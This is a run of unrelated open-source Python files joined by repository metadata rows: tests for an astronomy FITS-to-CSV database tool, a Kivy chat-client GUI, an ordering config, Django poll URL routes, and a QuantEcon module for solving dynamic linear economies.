def _create_fits_bintable_with_flags(fits_file):
"Create a FITS binary table with flags."
hdulist = fits.HDUList()
hdulist.append(fits.PrimaryHDU())
nbits = 64
nflags = 100
colnames = ['flags', 'id']
formats = ['%sX' % nflags, 'K']
data = [(np.array([True] + (nflags-1)*[False]),
np.array((nbits-1)*[False] + [True] + (nflags-nbits)*[False]),
np.array(nbits*[False] + [True] + (nflags-nbits-1)*[False])),
(0, 1, 2)]
columns = [fits.Column(name=colnames[i], format=formats[i],
array=data[i]) for i in range(len(colnames))]
bintable = fits.BinTableHDU.from_columns(columns)
bintable.name = 'TEST_DATA'
hdulist.append(bintable)
if os.path.isfile(fits_file):
os.remove(fits_file)
hdulist.writeto(fits_file, clobber=True)
def _create_csv_file(self, csv_file='test_file.csv',
column_mapping=None, fits_hdnum=1):
"""
Create a csv file from the FITS binary table.
"""
if column_mapping is None:
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
desc.pserv.create_csv_file_from_fits(self.fits_file, fits_hdnum,
csv_file,
column_mapping=column_mapping)
return csv_file
@staticmethod
def _read_csv_file(csv_file):
csv_data = []
with open(csv_file, 'r') as csv_input:
reader = csv.reader(csv_input, delimiter=',')
for i, row in enumerate(reader):
if i == 0:
# Skip the header line.
continue
csv_data.append((row[0], int(row[1]), float(row[2]),
np.float64(row[3]), row[4]))
return csv_data
def test_create_csv_file_from_fits(self):
"""
Test the creation of a csv file from a FITS binary table.
"""
csv_data = self._read_csv_file(self.csv_file)
self._compare_to_ref_data(csv_data)
def test_create_csv_file_from_fits_with_constant_columns(self):
"""
Test the creation of csv file from a FITS binary table with
constant numeric column values set in the column_mapping.
"""
int_value = 52
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', int_value),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
csv_file = self._create_csv_file(column_mapping=column_mapping)
csv_data = self._read_csv_file(csv_file)
for csv_row, ref_row in zip(csv_data, self.data):
self.assertEqual(csv_row[0], ref_row[0])
self.assertEqual(csv_row[1], int_value)
fp1 = '%.5e' % csv_row[2]
fp2 = '%.5e' % ref_row[2]
self.assertEqual(fp1, fp2)
fp1 = '%.10e' % csv_row[3]
fp2 = '%.10e' % ref_row[3]
self.assertEqual(fp1, fp2)
float_value = 719.3449
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', float_value),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
csv_file = self._create_csv_file(column_mapping=column_mapping)
csv_data = self._read_csv_file(csv_file)
for csv_row, ref_row in zip(csv_data, self.data):
self.assertEqual(csv_row[0], ref_row[0])
self.assertEqual(csv_row[1], ref_row[1])
fp1 = '%.5e' % csv_row[2]
fp2 = '%.5e' % float_value
self.assertEqual(fp1, fp2)
fp1 = '%.10e' % csv_row[3]
fp2 = '%.10e' % ref_row[3]
self.assertEqual(fp1, fp2)
def test_create_csv_file_from_fits_with_callbacks(self):
"""
Test the creation of a csv file from a FITS binary table with
callback functions applied (e.g., conversion to nanomaggies
using the zero point flux) applied to certain columns.
"""
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE'),
('project', self.project)))
callbacks = dict((('FLOAT_VALUE', lambda x: 2.981*x),
('DOUBLE_VALUE', lambda x: 0.321*x)))
csv_file = 'test_file_scaling.csv'
fits_hdunum = 1
desc.pserv.create_csv_file_from_fits(self.fits_file, fits_hdunum,
csv_file,
column_mapping=column_mapping,
callbacks=callbacks)
csv_data = self._read_csv_file(csv_file)
for csv_row, ref_row in zip(csv_data, self.data):
self.assertEqual(csv_row[0], ref_row[0])
self.assertEqual(csv_row[1], ref_row[1])
fp1 = '%.5e' % csv_row[2]
fp2 = '%.5e' % (callbacks['FLOAT_VALUE'](ref_row[2]))
self.assertEqual(fp1, fp2)
fp1 = '%.10e' % csv_row[3]
fp2 = '%.10e' % (callbacks['DOUBLE_VALUE'](ref_row[3]))
self.assertEqual(fp1, fp2)
os.remove(csv_file)
def test_create_csv_file_from_fits_with_added_columns(self):
"Test create_csv_file_from_fits with added columns."
fits_file = os.path.join(os.environ['PSERV_DIR'], 'tests',
'ref-0-10,11_truncated.fits.gz')
hdunum = 1
csv_file = 'test_added_columns.csv'
projectId = 1
desc.pserv.create_csv_file_from_fits(fits_file, hdunum, csv_file,
added_columns=dict(projectId=projectId))
with open(csv_file) as csv_data:
reader = csv.reader(csv_data, delimiter=',')
row = reader.next()
self.assertEqual(row[-1], 'projectId')
for row in reader:
self.assertEqual(row[-1], '%s' % projectId)
os.remove(csv_file)
def test_load_csv(self):
"""
Test that after loading the csv file generated from FITS data,
a query returns data consistent with the reference data.
"""
csv_file = self.csv_file
self.connection.load_csv(self.test_table, csv_file)
table_data = self._query_test_table()
self._compare_to_ref_data(table_data)
def test_incorrect_csv_mapping(self):
"""
Test that an incorrect column mapping raises a RuntimeError.
"""
# Test incorrect column ordering.
column_mapping = OrderedDict((('keywd', 'KEYWORD'),
('float_value', 'FLOAT_VALUE'),
('int_value', 'INT_VALUE'),
('double_value', 'DOUBLE_VALUE')))
csv_file = self._create_csv_file(column_mapping=column_mapping)
self.assertRaises(RuntimeError, self.connection.load_csv,
*(self.test_table, csv_file))
# Test incorrect column name.
column_mapping = OrderedDict((('keyword', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE')))
csv_file = self._create_csv_file(column_mapping=column_mapping)
self.assertRaises(RuntimeError, self.connection.load_csv,
*(self.test_table, csv_file))
# Test incorrect number of columns.
column_mapping = OrderedDict((('keyword', 'KEYWORD'),
('int_value', 'INT_VALUE'),
('float_value', 'FLOAT_VALUE'),
('float2_value', 'FLOAT_VALUE'),
('double_value', 'DOUBLE_VALUE')))
csv_file = self._create_csv_file(column_mapping=column_mapping)
self.assertRaises(RuntimeError, self.connection.load_csv,
*(self.test_table, csv_file))
os.remove(csv_file)
def test_create_schema_from_fits(self):
"Test the creation of a schema from a FITS binary table."
catalog_file = os.path.join(os.environ['PSERV_DIR'], 'tests',
'ref-0-10,11_truncated.fits.gz')
sql_file = 'bintable_schema.sql'
fits_hdunum = 1
table_name = 'deepCoadd_catalog'
desc.pserv.create_schema_from_fits(catalog_file, fits_hdunum, sql_file,
table_name,
primary_key='id, project',
add_columns=('project INT',))
with open(sql_file) as schema:
lines = [x.strip() for x in schema.readlines()]
self.assertIn('id BIGINT,', lines)
self.assertIn('coord_ra DOUBLE,', lines)
self.assertIn('deblend_nChild INT,', lines)
self.assertIn('base_SdssShape_xxSigma FLOAT,', lines)
self.assertIn('FLAGS1 BIGINT UNSIGNED,', lines)
self.assertIn('FLAGS2 BIGINT UNSIGNED,', lines)
self.assertIn('FLAGS3 BIGINT UNSIGNED,', lines)
self.assertIn('primary key (id, project)', lines)
self.assertIn('project INT,', lines)
os.remove(sql_file)
def test_create_csv_file_from_fits_with_flag(self):
"Test create_csv_file_from_fits for a file with flags."
fits_file = 'test_bin_table_flags.fits'
hdunum = 1
csv_file = 'test_bin_table_flags.csv'
self._create_fits_bintable_with_flags(fits_file)
desc.pserv.create_csv_file_from_fits(fits_file, hdunum, csv_file)
with open(csv_file) as csv_data:
self.assertEqual('FLAGS1,FLAGS2,id\n', csv_data.readline())
self.assertEqual('1,0,0\n', csv_data.readline())
self.assertEqual('%d,0,1\n' % 2**63, csv_data.readline())
self.assertEqual('0,1,2\n', csv_data.readline())
os.remove(fits_file)
os.remove(csv_file)
def test_get_pandas_data_frame(self):
"""
Test get_pandas_data_frame which retrieves a df with the table
data given a select query.
"""
self._fill_test_table()
# Test getting all of the columns
query = "select * from %s" % self.test_table
df = self.connection.get_pandas_data_frame(query)
self.assertEqual(df.shape, (4, 5))
self.assertEqual(df['keywd'].values[0], 'a')
self.assertAlmostEqual(df['double_value'].values[2], np.pi, places=5)
# Test getting a selection of columns.
query = "select keywd, double_value from %s" % self.test_table
df = self.connection.get_pandas_data_frame(query)
self.assertEqual(df.shape, (4, 2))
self.assertEqual(df['keywd'].values[0], 'a')
self.assertAlmostEqual(df['double_value'].values[2], np.pi, places=5)
class BinTableDataTestCase(unittest.TestCase):
"TestCase class for BinTableData class."
def setUp(self):
pass
def tearDown(self):
pass
def test_pack_flags(self):
"Test function to pack an array of bools into unsigned ints."
nflags = 142
nbits = 64
data = [np.array([True] + (nflags-1)*[False]),
np.array(nbits*[False] + [True] + (nflags-nbits-1)*[False]),
np.array(2*nbits*[False] + [True] + (nflags-2*nbits-1)*[False]),
np.array((nbits-1)*[False] + [True] + (nflags-nbits)*[False]),
np.array((2*nbits-1)*[False] + [True] + (nflags-2*nbits)*[False]),
np.array((nflags-1)*[False] + [True])]
expected = [(1, 0, 0), (0, 1, 0), (0, 0, 1),
(2**(nbits-1), 0, 0), (0, 2**(nbits-1), 0),
(0, 0, 2**(nflags-2*nbits-1))]
for flags, values in zip(data, expected):
packed = desc.pserv.BinTableData.pack_flags(flags, nbits=nbits)
for bigint, value in zip(packed, values):
self.assertEqual(bigint, value)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | -7,623,598,262,227,999,000 | 42.214953 | 85 | 0.527628 | false |
vaizguy/cryptikchaos | src/cryptikchaos/core/gui/service.py | 1 | 5439 | '''
Created on Oct 8, 2013
This file is part of CryptikChaos.
CryptikChaos is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CryptikChaos is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CryptikChaos. If not, see <http://www.gnu.org/licenses/>.
@author: vaizguy
'''
__author__ = "Arun Vaidya"
__version__ = "0.6.1"
from kivy.app import App
from kivy.resources import resource_add_path
from kivy.logger import Logger
from kivy.core.window import Window
from kivy.clock import Clock
from cryptikchaos.core.env.configuration import constants
try:
from cryptikchaos.libs.garden.navigationdrawer \
import NavigationDrawer
except ImportError:
from kivy.garden.navigationdrawer import NavigationDrawer
else:
pass
from cryptikchaos.core.gui.mainpanel import MainPanel
from cryptikchaos.core.gui.sidepanel import SidePanel
# Add kivy resource paths
resource_add_path(constants.KIVY_RESOURCE_PATH_1)
resource_add_path(constants.KIVY_RESOURCE_PATH_2)
class GUIService(App):
"Graphical user interface service."
# Init attributes
core_services = None
def __init__(self, handleinput_cmd_hook, getcommands_cmd_hook, **kwargs):
# Init App
super(GUIService, self).__init__(**kwargs)
# Disable default kivy settings
self.use_kivy_settings = False
# Main drawer
self.drawer = NavigationDrawer()
# Set up Main panel
self.main_panel = MainPanel(
# drawer obj
drawer=self.drawer,
# Console splash greeting
greeting=constants.GUI_WELCOME_MSG,
)
# Set up Side pane
self.side_panel = SidePanel(
# drawer obj
drawer=self.drawer,
# screen manager obj
main_panel=self.main_panel
)
# Apeend text to console hook
self.inputtext_gui_hook = self.main_panel.inputtext_gui_hook
# Get App GUI Width
self.getmaxwidth_gui_hook = self.main_panel.getmaxwidth_gui_hook
# Clear display hook
self.cleardisplay_gui_hook = self.main_panel.cleardisplay_gui_hook
# Update progress bar
self.cmdprog_gui_hook = self.main_panel.cmdprog_gui_hook
# Register CMD hooks
self.main_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
self.main_panel.register_getcommands_cmd_hook(
getcommands_cmd_hook)
self.side_panel.register_handleinput_cmd_hook(
handleinput_cmd_hook)
def build(self):
"Build the kivy App."
# Set title
self.title = "CryptikChaos"
# Add main and side pane
self.drawer.add_widget(self.side_panel)
self.drawer.add_widget(self.main_panel)
# Set animation type
self.drawer.anim_type = 'slide_above_anim'
# Bind Keyboard hook
self.bind(on_start=self.post_build_init)
return self.drawer
def on_start(self):
'''Event handler for the on_start event, which is fired after
initialization (after build() has been called), and before the
application is being run.
'''
Logger.debug("GUI: Cryptikchaos Client started.")
# Print criptikchaos banner
Clock.schedule_once(self.print_logo, 1)
def on_stop(self):
'''Event handler for the on_stop event, which is fired when the
application has finished running (e.g. the window is about to be
closed).
'''
Logger.debug("GUI: Stopped Cryptikchaos Client.")
def on_pause(self):
return True
def on_resume(self):
pass
def print_logo(self, *args):
"Print the criptikchaos logo."
if constants.GUI_LOGO:
# Print logo through log
Logger.info('GUI: \n{}'.format(constants.GUI_LOGO))
return args
def post_build_init(self, *args):
if constants.PLATFORM_ANDROID:
import android
android.map_key(android.KEYCODE_BACK, 1001)
win = Window
win.bind(on_keyboard=self.my_key_handler)
def toggle_drawer_state(self):
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
else:
self.drawer.anim_to_state("open")
def my_key_handler(self, window, keycode1, keycode2, text, modifiers):
#Logger.debug("H/W Keypress: {}".format(keycode1))
if keycode1 in [27, 1001]:
# Go to console screen or close app
if self.drawer.state == "open":
self.drawer.anim_to_state("closed")
elif self.main_panel.is_console_focused():
self.stop()
else:
self.main_panel.goto_console_screen()
return True
elif keycode1 == 319:
# Open navbar with menu key
self.toggle_drawer_state()
return True
else:
return False
| gpl-3.0 | 6,267,618,879,123,569,000 | 28.085561 | 77 | 0.627689 | false |
silenius/amnesia | amnesia/modules/folder/orders.py | 1 | 1754 | # -*- coding: utf-8 -*-
from amnesia.modules.content import Content
from amnesia.modules.content_type import ContentType
from amnesia.modules.event import Event
from amnesia.modules.account import Account
#from amnesia.modules.country import Country
from amnesia.order import EntityOrder
from amnesia.order import Path
def includeme(config):
config.include('amnesia.modules.content.mapper')
config.include('amnesia.modules.account.mapper')
config.include('amnesia.modules.event.mapper')
config.registry.settings['amnesia:orders'] = {
'title': EntityOrder(Content, 'title', 'asc', doc='title'),
'weight': EntityOrder(Content, 'weight', 'desc', doc='default'),
'update': EntityOrder(
Content, 'last_update', 'desc', doc='last update'
),
'added': EntityOrder(Content, 'added', 'desc', doc='added date'),
'type': EntityOrder(
ContentType, 'name', 'asc', path=[Path(Content, 'type')],
doc='content type'
),
'owner': EntityOrder(Account, 'login', 'asc', path=[Path(Content,
'owner')],
doc='owner'),
'starts': EntityOrder(Event, 'starts', 'desc', doc='event starts'),
'ends': EntityOrder(Event, 'ends', 'desc', doc='event ends'),
# 'country' : EntityOrder(Country, 'name', 'asc', path=[Path(Event,
# 'country')],
# doc='event country'),
# 'major' : EntityOrder(MimeMajor, 'name', 'asc',
# path=[Path(File, 'mime'), Path(Mime, 'major')],
# doc='mime')
}
| bsd-2-clause | -7,095,688,458,044,918,000 | 41.780488 | 80 | 0.54618 | false |
theneurasthenicrat/whale4 | polls/urls.py | 1 | 2490 | # -*- coding: utf-8 -*-
from django.conf.urls import url
from django.views.generic import TemplateView
from polls import views
uuid4="[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}"
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^redirectPage/$', views.redirect_page, name='redirectPage'),
url(r'^choosePollType$', views.choose_poll_type, name='choosePollType'),
url(r'^candidateCreate/('+uuid4+')/$', views.candidate_create, name='candidateCreate'),
url(r'^dateCandidateCreate/('+uuid4+')/$', views.date_candidate_create, name='dateCandidateCreate'),
url(r'^manageCandidate/('+uuid4+')/$', views.manage_candidate, name='manageCandidate'),
url(r'^updatePoll/(' + uuid4 +')/$', views.update_voting_poll, name='updatePoll'),
url(r'^deleteCandidate/('+uuid4+')/([^/]+)/$', views.delete_candidate, name='deleteCandidate'),
url(r'^updateVote/('+uuid4+')/([^/]+)/$', views.update_vote, name='updateVote'),
url(r'^deleteVote/('+uuid4+')/([^/]+)/$', views.delete_vote, name='deleteVote'),
url(r'^deleteAnonymous/('+uuid4+')/([^/]+)/$', views.delete_anonymous, name='deleteAnonymous'),
url(r'^newPoll/(?P<choice>[^/]+)/$', views.new_poll, name='newPoll'),
url(r'^viewPoll/('+uuid4+')', views.view_poll, name='viewPoll'),
url(r'^status/('+uuid4+')', views.status, name='status'),
url(r'^viewPollSecret/('+uuid4+')/([^/]+)/$', views.view_poll_secret, name='viewPollSecret'),
url(r'^vote/('+uuid4+')', views.vote, name='vote'),
url(r'^invitation/('+uuid4+')/$', views.invitation, name='invitation'),
url(r'^admin/('+uuid4+')/$', views.admin_poll, name='admin'),
url(r'^resetPoll/('+uuid4+')/$', views.reset_poll, name='resetPoll'),
url(r'^advancedParameters/('+uuid4+')/$', views.advanced_parameters, name='advancedParameters'),
url(r'^deleteVotingPoll/(' + uuid4 +')/$', views.delete_poll, name='deleteVotingPoll'),
url(r'^certificate/('+uuid4+')', views.certificate, name='certificate'),
url(r'^results/('+uuid4+')', views.result_all, name='results'),
url(r'^viewResult/('+uuid4+')/([^/]+)/$', views.result_view, name='viewResult'),
url(r'^scores/('+uuid4+')/([^/]+)/$', views.result_scores, name='scores'),
url(r'^data/('+uuid4+')', views.data_page, name='data'),
url(r'^allData$', TemplateView.as_view(template_name='polls/all_data.html'), name='allData'),
url(r'^about$', TemplateView.as_view(template_name='polls/about.html'), name='about'),
]
| gpl-3.0 | -2,989,620,190,023,986,000 | 64.526316 | 104 | 0.627711 | false |
oyamad/QuantEcon.py | quantecon/dle.py | 1 | 14017 | """
Provides a class called DLE to convert and solve dynamic linear economics
(as set out in Hansen & Sargent (2013)) as LQ problems.
"""
import numpy as np
from .lqcontrol import LQ
from .matrix_eqn import solve_discrete_lyapunov
from .rank_nullspace import nullspace
class DLE(object):
r"""
This class is for analyzing dynamic linear economies, as set out in Hansen & Sargent (2013).
The planner's problem is to choose \{c_t, s_t, i_t, h_t, k_t, g_t\}_{t=0}^\infty to maximize
\max -(1/2) \mathbb{E} \sum_{t=0}^{\infty} \beta^t [(s_t - b_t).(s_t-b_t) + g_t.g_t]
subject to the linear constraints
\Phi_c c_t + \Phi_g g_t + \Phi_i i_t = \Gamma k_{t-1} + d_t
k_t = \Delta_k k_{t-1} + \Theta_k i_t
h_t = \Delta_h h_{t-1} + \Theta_h c_t
s_t = \Lambda h_{t-1} + \Pi c_t
and
z_{t+1} = A_{22} z_t + C_2 w_{t+1}
b_t = U_b z_t
d_t = U_d z_t
where h_{-1}, k_{-1}, and z_0 are given as initial conditions.
Section 5.5 of HS2013 describes how to map these matrices into those of
a LQ problem.
HS2013 sort the matrices defining the problem into three groups:
Information: A_{22}, C_2, U_b , and U_d characterize the motion of information
sets and of taste and technology shocks
Technology: \Phi_c, \Phi_g, \Phi_i, \Gamma, \Delta_k, and \Theta_k determine the
technology for producing consumption goods
Preferences: \Delta_h, \Theta_h, \Lambda, and \Pi determine the technology for
producing consumption services from consumer goods. A scalar discount factor \beta
determines the preference ordering over consumption services.
Parameters
----------
Information : tuple
Information is a tuple containing the matrices A_{22}, C_2, U_b, and U_d
Technology : tuple
Technology is a tuple containing the matrices \Phi_c, \Phi_g, \Phi_i, \Gamma,
\Delta_k, and \Theta_k
Preferences : tuple
Preferences is a tuple containing the matrices \Delta_h, \Theta_h, \Lambda,
\Pi, and the scalar \beta
"""
def __init__(self, information, technology, preferences):
# === Unpack the tuples which define information, technology and preferences === #
self.a22, self.c2, self.ub, self.ud = information
self.phic, self.phig, self.phii, self.gamma, self.deltak, self.thetak = technology
self.beta, self.llambda, self.pih, self.deltah, self.thetah = preferences
# === Computation of the dimension of the structural parameter matrices === #
self.nb, self.nh = self.llambda.shape
self.nd, self.nc = self.phic.shape
self.nz, self.nw = self.c2.shape
junk, self.ng = self.phig.shape
self.nk, self.ni = self.thetak.shape
# === Creation of various useful matrices === #
uc = np.hstack((np.eye(self.nc), np.zeros((self.nc, self.ng))))
ug = np.hstack((np.zeros((self.ng, self.nc)), np.eye(self.ng)))
phiin = np.linalg.inv(np.hstack((self.phic, self.phig)))
phiinc = uc.dot(phiin)
phiing = ug.dot(phiin)
b11 = - self.thetah.dot(phiinc).dot(self.phii)
a1 = self.thetah.dot(phiinc).dot(self.gamma)
a12 = np.vstack((self.thetah.dot(phiinc).dot(
self.ud), np.zeros((self.nk, self.nz))))
# === Creation of the A Matrix for the state transition of the LQ problem === #
a11 = np.vstack((np.hstack((self.deltah, a1)), np.hstack(
(np.zeros((self.nk, self.nh)), self.deltak))))
self.A = np.vstack((np.hstack((a11, a12)), np.hstack(
(np.zeros((self.nz, self.nk + self.nh)), self.a22))))
# === Creation of the B Matrix for the state transition of the LQ problem === #
b1 = np.vstack((b11, self.thetak))
self.B = np.vstack((b1, np.zeros((self.nz, self.ni))))
# === Creation of the C Matrix for the state transition of the LQ problem === #
self.C = np.vstack((np.zeros((self.nk + self.nh, self.nw)), self.c2))
# === Define R,W and Q for the payoff function of the LQ problem === #
self.H = np.hstack((self.llambda, self.pih.dot(uc).dot(phiin).dot(self.gamma), self.pih.dot(
uc).dot(phiin).dot(self.ud) - self.ub, -self.pih.dot(uc).dot(phiin).dot(self.phii)))
self.G = ug.dot(phiin).dot(
np.hstack((np.zeros((self.nd, self.nh)), self.gamma, self.ud, -self.phii)))
self.S = (self.G.T.dot(self.G) + self.H.T.dot(self.H)) / 2
self.nx = self.nh + self.nk + self.nz
self.n = self.ni + self.nh + self.nk + self.nz
self.R = self.S[0:self.nx, 0:self.nx]
self.W = self.S[self.nx:self.n, 0:self.nx]
self.Q = self.S[self.nx:self.n, self.nx:self.n]
# === Use quantecon's LQ code to solve our LQ problem === #
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
self.P, self.F, self.d = lq.stationary_values()
# === Construct output matrices for our economy using the solution to the LQ problem === #
self.A0 = self.A - self.B.dot(self.F)
self.Sh = self.A0[0:self.nh, 0:self.nx]
self.Sk = self.A0[self.nh:self.nh + self.nk, 0:self.nx]
self.Sk1 = np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))
self.Si = -self.F
self.Sd = np.hstack((np.zeros((self.nd, self.nh + self.nk)), self.ud))
self.Sb = np.hstack((np.zeros((self.nb, self.nh + self.nk)), self.ub))
self.Sc = uc.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Sg = ug.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Ss = self.llambda.dot(np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk + self.nz))))) + self.pih.dot(self.Sc)
# === Calculate eigenvalues of A0 === #
self.A110 = self.A0[0:self.nh + self.nk, 0:self.nh + self.nk]
self.endo = np.linalg.eigvals(self.A110)
self.exo = np.linalg.eigvals(self.a22)
# === Construct matrices for Lagrange Multipliers === #
self.Mk = -2 * np.asscalar(self.beta) * (np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))).dot(self.P).dot(self.A0)
self.Mh = -2 * np.asscalar(self.beta) * (np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk)), np.zeros((self.nh, self.nz))))).dot(self.P).dot(self.A0)
self.Ms = -(self.Sb - self.Ss)
self.Md = -(np.linalg.inv(np.vstack((self.phic.T, self.phig.T))).dot(
np.vstack((self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms), -self.Sg))))
self.Mc = -(self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms))
self.Mi = -(self.thetak.T.dot(self.Mk))
def compute_steadystate(self, nnc=2):
"""
Computes the non-stochastic steady-state of the economy.
Parameters
----------
nnc : array_like(float)
nnc is the location of the constant in the state vector x_t
"""
zx = np.eye(self.A0.shape[0])-self.A0
self.zz = nullspace(zx)
self.zz /= self.zz[nnc]
self.css = self.Sc.dot(self.zz)
self.sss = self.Ss.dot(self.zz)
self.iss = self.Si.dot(self.zz)
self.dss = self.Sd.dot(self.zz)
self.bss = self.Sb.dot(self.zz)
self.kss = self.Sk.dot(self.zz)
self.hss = self.Sh.dot(self.zz)
def compute_sequence(self, x0, ts_length=None, Pay=None):
"""
Simulate quantities and prices for the economy
Parameters
----------
x0 : array_like(float)
The initial state
ts_length : scalar(int)
Length of the simulation
Pay : array_like(float)
Vector to price an asset whose payout is Pay*xt
"""
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
xp, up, wp = lq.compute_sequence(x0, ts_length)
self.h = self.Sh.dot(xp)
self.k = self.Sk.dot(xp)
self.i = self.Si.dot(xp)
self.b = self.Sb.dot(xp)
self.d = self.Sd.dot(xp)
self.c = self.Sc.dot(xp)
self.g = self.Sg.dot(xp)
self.s = self.Ss.dot(xp)
# === Value of J-period risk-free bonds === #
# === See p.145: Equation (7.11.2) === #
e1 = np.zeros((1, self.nc))
e1[0, 0] = 1
self.R1_Price = np.empty((ts_length + 1, 1))
self.R2_Price = np.empty((ts_length + 1, 1))
self.R5_Price = np.empty((ts_length + 1, 1))
for i in range(ts_length + 1):
self.R1_Price[i, 0] = self.beta * e1.dot(self.Mc).dot(np.linalg.matrix_power(
self.A0, 1)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R2_Price[i, 0] = self.beta**2 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 2)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R5_Price[i, 0] = self.beta**5 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 5)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
# === Gross rates of return on 1-period risk-free bonds === #
self.R1_Gross = 1 / self.R1_Price
# === Net rates of return on J-period risk-free bonds === #
# === See p.148: log of gross rate of return, divided by j === #
self.R1_Net = np.log(1 / self.R1_Price) / 1
self.R2_Net = np.log(1 / self.R2_Price) / 2
self.R5_Net = np.log(1 / self.R5_Price) / 5
# === Value of asset whose payout vector is Pay*xt === #
# See p.145: Equation (7.11.1)
if isinstance(Pay, np.ndarray) == True:
self.Za = Pay.T.dot(self.Mc)
self.Q = solve_discrete_lyapunov(
self.A0.T * self.beta**0.5, self.Za)
self.q = self.beta / (1 - self.beta) * \
np.trace(self.C.T.dot(self.Q).dot(self.C))
self.Pay_Price = np.empty((ts_length + 1, 1))
self.Pay_Gross = np.empty((ts_length + 1, 1))
self.Pay_Gross[0, 0] = np.nan
for i in range(ts_length + 1):
self.Pay_Price[i, 0] = (xp[:, i].T.dot(self.Q).dot(
xp[:, i]) + self.q) / e1.dot(self.Mc).dot(xp[:, i])
for i in range(ts_length):
self.Pay_Gross[i + 1, 0] = self.Pay_Price[i + 1,
0] / (self.Pay_Price[i, 0] - Pay.dot(xp[:, i]))
return
def irf(self, ts_length=100, shock=None):
"""
Create Impulse Response Functions
Parameters
----------
ts_length : scalar(int)
Number of periods to calculate IRF
Shock : array_like(float)
Vector of shocks to calculate IRF to. Default is first element of w
"""
if type(shock) != np.ndarray:
# Default is to select first element of w
shock = np.vstack((np.ones((1, 1)), np.zeros((self.nw - 1, 1))))
self.c_irf = np.empty((ts_length, self.nc))
self.s_irf = np.empty((ts_length, self.nb))
self.i_irf = np.empty((ts_length, self.ni))
self.k_irf = np.empty((ts_length, self.nk))
self.h_irf = np.empty((ts_length, self.nh))
self.g_irf = np.empty((ts_length, self.ng))
self.d_irf = np.empty((ts_length, self.nd))
self.b_irf = np.empty((ts_length, self.nb))
for i in range(ts_length):
self.c_irf[i, :] = self.Sc.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.s_irf[i, :] = self.Ss.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.i_irf[i, :] = self.Si.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.k_irf[i, :] = self.Sk.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.h_irf[i, :] = self.Sh.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.g_irf[i, :] = self.Sg.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.d_irf[i, :] = self.Sd.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.b_irf[i, :] = self.Sb.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
return
def canonical(self):
"""
Compute canonical preference representation
Uses auxiliary problem of 9.4.2, with the preference shock process reintroduced
Calculates pihat, llambdahat and ubhat for the equivalent canonical household technology
"""
Ac1 = np.hstack((self.deltah, np.zeros((self.nh, self.nz))))
Ac2 = np.hstack((np.zeros((self.nz, self.nh)), self.a22))
Ac = np.vstack((Ac1, Ac2))
Bc = np.vstack((self.thetah, np.zeros((self.nz, self.nc))))
Cc = np.vstack((np.zeros((self.nh, self.nw)), self.c2))
Rc1 = np.hstack((self.llambda.T.dot(self.llambda), -
self.llambda.T.dot(self.ub)))
Rc2 = np.hstack((-self.ub.T.dot(self.llambda), self.ub.T.dot(self.ub)))
Rc = np.vstack((Rc1, Rc2))
Qc = self.pih.T.dot(self.pih)
Nc = np.hstack(
(self.pih.T.dot(self.llambda), -self.pih.T.dot(self.ub)))
lq_aux = LQ(Qc, Rc, Ac, Bc, N=Nc, beta=self.beta)
P1, F1, d1 = lq_aux.stationary_values()
self.F_b = F1[:, 0:self.nh]
self.F_f = F1[:, self.nh:]
self.pihat = np.linalg.cholesky(self.pih.T.dot(
self.pih) + self.beta.dot(self.thetah.T).dot(P1[0:self.nh, 0:self.nh]).dot(self.thetah)).T
self.llambdahat = self.pihat.dot(self.F_b)
self.ubhat = - self.pihat.dot(self.F_f)
return
